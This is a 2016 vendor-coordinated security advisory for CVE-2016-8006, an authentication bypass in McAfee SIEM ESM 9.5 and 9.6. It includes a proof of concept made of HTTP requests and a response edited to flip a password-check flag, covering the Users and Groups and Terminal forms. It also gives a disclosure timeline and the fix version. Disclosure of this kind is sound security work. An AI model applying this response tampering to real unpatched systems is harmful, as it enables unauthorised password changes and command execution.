• Consulting
  • Information Security
  • Networking
  • Software Development
  • R&D
  • McAfee SIEM ESM and ESMREC Authentication Bypass vulnerability

    12-09-2016

    McAfee SIEM ESM and ESMREC Authentication Bypass vulnerability

    Quantum Leap Advisory McAfee SIEM ESM and ESMREC Authentication Bypass vulnerability
    Affected Product: SIEM 9.5 and 9.6.
    Credits: Vulnerability discovered by Claudio Cinquino of Quantum Leap S.R.L.
    CVE: CVE-2016-8006

    Executive Summary

    SIEM 9.5 and 9.6.0 allow an administrative user to make changes to other SIEM users’ information including user passwords without supplying the current admin password a second time. GUI “Terminal” commands are also allowed by an active logged-in admin user without supplying the logged-in admin password a second time.

    Proof of Concept

    Authentication Bypass vulnerability has been detected on “Users and Groups” and “Terminal” forms in McAfee SIEM ESM 9.5.x and 9.6.x. For Authentication Bypass, set in password form any password and change response.

    Authentication Bypass vulnerability on Users and Groups

    Request:
    POST /ess HTTP/1.1
    Host: 192.168.164.110
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: https://192.168.164.110/Application.swf
    Content-type: application/x-www-form-urlencoded
    Content-Length: 72

    Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

    Original Response:

    HTTP/1.1 200 OK
    Date: Thu, 12 May 2016 09:08:31 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

    Edited Response:

    HTTP/1.1 200 OK
    Date: Thu, 12 May 2016 09:08:31 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14

    Authentication Bypass vulnerability on Terminal

    Request:
    POST /ess HTTP/1.1
    Host: 192.168.164.110
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: https://192.168.164.110/Application.swf
    Content-type: application/x-www-form-urlencoded
    Content-Length: 72

    Request=API%13USER%5FVERIFYPW%13%14SID%131300480451%13%14PW%13test%13%14

    Original Response:

    HTTP/1.1 200 OK
    Date: Thu, 12 May 2016 09:13:57 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    Response=EC%130%13%14OK%13F%13%14DCHNG%13F%13%14

    Edited Response:

    HTTP/1.1 200 OK
    Date: Thu, 12 May 2016 09:13:57 GMT
    Server: Apache
    X-Frame-Options: SAMEORIGIN
    Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48

    Response=EC%130%13%14OK%13T%13%14DCHNG%13F%13%14

     

    Figure 1 show example of Authentication Bypass of McAfee SIEM 9.5 and 9.6 for “Users and Groups”.

    mcafee bypass

    Figure 1 – “Users and Groups” Authentication Bypass Vulnerability McAfee SIEM ESM 9.5.0MR7 PoC

    Solution

    To fix the security issue we recommend to update at new version to 9.6.0 MR3 SIEM, the vendor has resolved this issue.

    Disclosure Timeline

    11/05/2016 – Vulnerability Discovered
    12/05/2016 – Initial vendor notification
    09/09/2016 – The vendor fixed the vulnerability
    09/09/2016 – The vendor public Knowledge Bulletin
    16/09/2016 – CVE Assigned

    References

    [1] http://cwe.mitre.org/data/definitions/592.html
    [2] https://www.owasp.org/index.php/Category:Authentication_Vulnerability
    [3] https://kc.mcafee.com/corporate/index?page=content&id=KB87744

    Claudio Cinquino
    Trovami

    Claudio Cinquino

    Security Auditor at Quantum Leap s.r.l.
    Claudio Cinquino
    Trovami